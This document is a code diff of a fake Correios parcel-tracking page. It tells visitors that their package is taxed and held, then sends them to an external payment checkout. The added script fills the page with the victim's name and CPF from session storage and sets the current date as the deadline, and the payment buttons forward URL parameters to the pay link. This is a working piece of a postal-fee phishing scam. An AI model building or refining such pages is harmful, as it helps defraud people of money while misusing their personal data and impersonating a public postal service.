--- a/correios/rastreio/index.html
+++ b/correios/rastreio/index.html
@@ -1,6 +1,9 @@
-<html lang="pt-BR"><head>
+<html lang="pt-BR">
+
+<head>
     <title>🟢 RASTREANDO</title>
-    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no, shrink-to-fit=no">
+    <meta name="viewport"
+        content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no, shrink-to-fit=no">
     <meta http-equiv="content-type" content="text/html; charset=utf-8">
     <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
     <link rel="icon" href="images/qt80YQ8lK60n.ico">
@@ -20,89 +23,190 @@
     <link rel="dns-prefetch preconnect" href="https://fonts.gstatic.com" crossorigin="">
     <link rel="dns-prefetch preconnect" href="https://www.greatpages.com.br" crossorigin="">
     <style type="text/css" id="operaUserStyle"></style>
-    <link href="https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,400;0,700;1,400;1,700&family=Open+Sans:ital,wght@0,400;0,700;1,400;1,700&display=swap" rel="stylesheet" media="all">
+    <link
+        href="https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,400;0,700;1,400;1,700&family=Open+Sans:ital,wght@0,400;0,700;1,400;1,700&display=swap"
+        rel="stylesheet" media="all">
 </head>
 
 <body class="">
+    <script>
+        document.addEventListener("DOMContentLoaded", () => {
+            console.log("DADOS");
+
+            const cpf = sessionStorage.getItem("cpf") || "CPF não disponível";
+            const nome = sessionStorage.getItem("nome") || "Nome não disponível";
+
+
+            const dataAtual = new Date().toLocaleDateString("pt-BR");
+
+            console.log("CPF:", cpf);
+            console.log("Nome:", nome);
+            console.log("Data Atual:", dataAtual);
+
+            if (document.getElementById("nome_info")) {
+                document.getElementById("nome_info").innerText = nome;
+            }
+            if (document.getElementById("nome_info2")) {
+                document.getElementById("nome_info2").innerText = nome;
+            }
+
+            if (document.getElementById("cpf_info")) {
+                document.getElementById("cpf_info").innerText = cpf;
+            }
+            if (document.getElementById("cpf_info2")) {
+                document.getElementById("cpf_info2").innerText = cpf;
+            }
+
+            if (document.getElementById("data_info")) {
+                document.getElementById("data_info").innerText = dataAtual;
+            }
+        });
+
+    </script>
+
     <div id="site" tyle="white-space: normal;">
         <div id="b_1225979_1_1736606248678282284c60c" class="gpc-b" style="white-space: normal;">
             <div class="gpc-b_sobreposicao"></div>
         </div>
+
         <div id="b_1225979_1_1736606248678282284c5df" class="gpc-b " style="white-space: normal;">
             <div class="gpc-b_sobreposicao"></div>
             <div class="centralizar">
+
                 <div id="e_1225979_1_57686_m" class="gpc-e e_imagem dm e_1225979_1_57686">
                     <div class="c imagem e_imagem">
                         <div class="imagem_fundo"></div>
                     </div>
                 </div>
-                <div id="e_1225979_1_60477_m" class="gpc-e e_texto dm dm e_1225979_1_60477" style="white-space: normal;">
+
+                <div id="e_1225979_1_60477_m" class="gpc-e e_texto dm dm e_1225979_1_60477"
+                    style="white-space: normal;">
                     <div class="c e_texto" style="white-space: normal;">
-                        <p><span><br></span></p>
-                        <p><span><br>Não informado</span></p>
+                        <p>
+                            <span>
+                                <br>
+                            </span>
+                        </p>
+                        <p>
+                            <span>
+                                <br>
+                                <span id="nome_info"></span>
+                            </span>
+                        </p>
                     </div>
                 </div>
-                <div id="e_1225979_1_51231_m" class="gpc-e e_texto dm dm e_1225979_1_51231" style="white-space: normal;">
+
+
+                <div id="e_1225979_1_51231_m" class="gpc-e e_texto dm dm e_1225979_1_51231"
+                    style="white-space: normal;">
                     <div class="c e_texto" style="white-space: normal;">
-                    <br>
-                    <br>
-                        <p style="white-space: normal;"><span><b>ENCOMENDA TRIBUTADA</b></span></p>
+                        <br>
+                        <br>
+                        <p style="white-space: normal;">
+                            <span>
+                                <b>ENCOMENDA TRIBUTADA</b>
+                            </span>
+                        </p>
                     </div>
                 </div>
-                <div id="e_1225979_1_75116_m" class="gpc-e e_texto dm dm e_1225979_1_75116" style="white-space: normal;">
+
+
+                <div id="e_1225979_1_75116_m" class="gpc-e e_texto dm dm e_1225979_1_75116"
+                    style="white-space: normal;">
                     <div class="c e_texto" style="white-space: normal;">
-                        <p><span><br><br></span></p>
-                        Não informado                    </div>
+                        <p>
+                            <span>
+                                <br>
+                                <br>
+                            </span>
+                        </p>
+                        <p id="cpf_info"></p>
+                    </div>
                 </div>
-                <div id="e_1225979_1_83162_m" class="gpc-e e_texto dm dm e_1225979_1_83162" style="white-space: normal;">
+
+
+                <div id="e_1225979_1_83162_m" class="gpc-e e_texto dm dm e_1225979_1_83162"
+                    style="white-space: normal;">
                     <div class="c e_texto" style="white-space: normal;">
-                        <p><b>  Sua encomenda foi TRIBUTADA</b></p>
+                        <p><b> Sua encomenda foi TRIBUTADA</b></p>
                         <p><b><br></b></p>
                     </div>
                 </div>
-                <div id="e_1225979_1_24573_m" class="gpc-e e_texto dm dm e_1225979_1_24573" style="white-space: normal;">
+
+
+                <div id="e_1225979_1_24573_m" class="gpc-e e_texto dm dm e_1225979_1_24573"
+                    style="white-space: normal;">
                     <div class="c e_texto" style="white-space: normal;">
                         <p><span>Status da entrega: <b>Aguardando Pagamento</b></span></p>
                     </div>
                 </div>
-                <div id="e_1225979_1_10156_m" class="gpc-e e_texto dm dm e_1225979_1_10156" style="white-space: normal;">
-                    <div class="c e_texto" style="white-space: normal;"> 
+
+
+                <div id="e_1225979_1_10156_m" class="gpc-e e_texto dm dm e_1225979_1_10156"
+                    style="white-space: normal;">
+                    <div class="c e_texto" style="white-space: normal;">
                         <p><span><b>Sua encomenda está retida na agência dos correios em Cutiriba - PR</b></span></p>
                     </div>
                 </div>
+
+
                 <div id="e_1225979_1_16907_m" class="gpc-e e_imagem dm e_1225979_1_16907" style="white-space: normal;">
                     <div class="c imagem e_imagem" style="white-space: normal;">
                         <div class="imagem_fundo"></div>
                     </div>
                 </div>
-                <div id="e_1225979_1_23145_m" class="gpc-e e_titulo dm dm e_1225979_1_23145" style="white-space: normal;">
+
+
+                <div id="e_1225979_1_23145_m" class="gpc-e e_titulo dm dm e_1225979_1_23145"
+                    style="white-space: normal;">
                     <div class="c e_titulo" style="white-space: normal;">
                         <h1><span>Receber até dia <b>11/03/2025</b><b> </b>após o pagamento</span></h1>
                     </div>
                 </div>
+
+
                 <div id="e_1225979_1_34836_m" class="gpc-e e_titulo dm dm e_1225979_1_34836">
                     <div class="c e_titulo" style="white-space: normal;">
-                        <h2><b><a href="https://pay.risepay.com.br/Pay/823a0c818b934c4cb4e30a3f4f8a3a8d?name=Não informado&document=Não informado" class="link_externo" id="c3641828-69dd-515d-aa72-725a4ec5112c">Efetuar
+                        <h2><b><a onclick="redirect(event)" class="link_externo"
+                                    id="c3641828-69dd-515d-aa72-725a4ec5112c">Efetuar
                                     Pagamento</a></b></h2>
                     </div>
                 </div>
+
+
                 <div id="e_1225979_1_65553" class="gpc-e e_texto dd dm e_1225979_1_65553" style="white-space: normal;">
                     <div class="c e_texto" style="white-space: normal;">
-                        <p><span>Nome Completo:</span></p>
-                        <p><span><b>Não informado<br><br></b>CPF:<b> Não informado<br><br></b>Prazo para regularização:<b>
-                                    08/03/2025</b></span></p>
+                        <p>
+                            <span>Nome Completo:</span><br>
+                            <span id="nome_info2"></span>
+                        <p>
+                            <br>
+                            <span style="margin-bottom: 3%;">CPF: <br><b><span id="cpf_info2"></span></b>
+                                <br>
+                                <br>
+                                </b><span>Prazo para regularização:</span>
+                                <p>
+                                    <b></b><span id="data_info">Data Indisponível</span></b>
+                                </p>
+
+                            </span>
+                        </p>
                     </div>
                 </div>
                 <br><br>
                 <div id="e_1225979_1_28606" class="gpc-e e_botao dd dm e_1225979_1_28606" style="white-space: normal;">
-                <br>
-                    <a class="c borda_igual e_botao link_externo" href="https://pay.risepay.com.br/Pay/823a0c818b934c4cb4e30a3f4f8a3a8d?name=Não informado&document=Não informado" id="695630e3-6473-1ac3-8204-ddee1fec1ad1" style="white-space: normal;">CLIQUE AQUI PARA LIBERAR SEU PEDIDO</a></div>
+                    <br>
+                    <a class="c borda_igual e_botao link_externo" onclick="redirect(event)"
+                        style="white-space: normal;">CLIQUE AQUI PARA LIBERAR
+                        SEU PEDIDO</a>
+                </div>
                 <div id="e_1225979_1_53338" class="gpc-e e_imagem dd dm e_1225979_1_53338" style="white-space: normal;">
                     <div cla="" ss="c imagem e_imagem" style="white-space: normal;">
                         <div class="imagem_fundo"></div>
                     </div>
                 </div>
-                <div id="e_1225979_1_173671440078955287" class="gpc-e e_caixa dd dm e_1225979_1_173671440078955287" style="white-space: normal;">
+                <div id="e_1225979_1_173671440078955287" class="gpc-e e_caixa dd dm e_1225979_1_173671440078955287"
+                    style="white-space: normal;">
                     <div class="c borda_igual e_caixa"></div>
                 </div>
                 <div id="e_1225979_1_72799" class="gpc-e e_titulo dd dm e_1225979_1_72799" style="white-space: normal;">
@@ -116,7 +220,10 @@
         <div id="b_1225979_1_1736606248678282284c603" class="gpc-b">
             <div class="gpc-b_sobreposicao"></div>
             <div class="centralizar">
-                <div id="e_1225979_1_57686_d" ll_src="https://cdn.greatsoftwares.com.br/arquivos/paginas_editor/15850-b8129ec4c63a313a704841b1ec612268.png" ll_src_mobile="https://cdn.greatsoftwares.com.br/arquivos/paginas_editor/15850-b8129ec4c63a313a704841b1ec612268.png" class="gpc-e e_imagem dd e_1225979_1_57686 se_imagem">
+                <div id="e_1225979_1_57686_d"
+                    ll_src="https://cdn.greatsoftwares.com.br/arquivos/paginas_editor/15850-b8129ec4c63a313a704841b1ec612268.png"
+                    ll_src_mobile="https://cdn.greatsoftwares.com.br/arquivos/paginas_editor/15850-b8129ec4c63a313a704841b1ec612268.png"
+                    class="gpc-e e_imagem dd e_1225979_1_57686 se_imagem">
                     <div class="c imagem e_imagem"></div>
                 </div>
                 <div id="e_1225979_1_60477_d" class="gpc-e e_texto dd e_1225979_1_60477">
@@ -151,17 +258,20 @@
                         <p><span><b>Sua encomenda está retida na agência dos correios em Cutiriba - PR</b></span></p>
                     </div>
                 </div>
-                <div id="e_1225979_1_16907_d" ll_src="https://cdn.greatsoftwares.com.br/arquivos/paginas_editor/15850-3aeaa092368e52344c66b50a36527aa0.png" ll_src_mobile="https://cdn.greatsoftwares.com.br/arquivos/paginas_editor/15850-3aeaa092368e52344c66b50a36527aa0.png" class="gpc-e e_imagem dd e_1225979_1_16907 se_imagem">
+                <div id="e_1225979_1_16907_d"
+                    ll_src="https://cdn.greatsoftwares.com.br/arquivos/paginas_editor/15850-3aeaa092368e52344c66b50a36527aa0.png"
+                    ll_src_mobile="https://cdn.greatsoftwares.com.br/arquivos/paginas_editor/15850-3aeaa092368e52344c66b50a36527aa0.png"
+                    class="gpc-e e_imagem dd e_1225979_1_16907 se_imagem">
                     <div class="c imagem e_imagem"></div>
                 </div>
-                <div id="e_1225979_1_23145_d" class="gpc-e e_titulo dd e_1225979_1_23145" style="white-space: normal;"> 
+                <div id="e_1225979_1_23145_d" class="gpc-e e_titulo dd e_1225979_1_23145" style="white-space: normal;">
                     <div class="c e_titulo" style="white-space: normal;">
                         <h1><span>Receber até dia <b>11/03/2025</b><b> </b>após o pagamento</span></h1>
                     </div>
                 </div>
                 <div id="e_1225979_1_34836_d" class="gpc-e e_titulo dd e_1225979_1_34836" style="white-space: normal;">
                     <div class="c e_titulo" style="white-space: normal;">
-                        <h2><b><a href="https://pay.risepay.com.br/Pay/823a0c818b934c4cb4e30a3f4f8a3a8d?name=Não informado&document=Não informado" class="link_externo" id="33ba3c37-86af-eb59-2201-9cde01fc9125">Efetuar
+                        <h2><b><a onclick="redirect(event)" class="link_externo">Efetuar
                                     Pagamento</a></b></h2>
                     </div>
                 </div>
@@ -177,14 +287,15 @@
         }
     </style>
     <script>
-  window.pixelId = "67b55e4dab32c3b13a0c40d2";
-  var a = document.createElement("script");
-  a.setAttribute("async", "");
-  a.setAttribute("defer", "");
-  a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
-  document.head.appendChild(a);
-</script>
-<script src="js/6kkom3fQNbTi.js" data-utmify-prevent-subids="" async="" defer=""></script>
+        function redirect(event) {
+            event.preventDefault();
+            var currentUrlParams = window.location.search;
+            window.location.href = "https://pay.risepay.com.br/Pay/823a0c818b934c4cb4e30a3f4f8a3a8d" + currentUrlParams;
+        }
+    </script>
 
 
-</body></html>
+
+</body>
+
+</html>
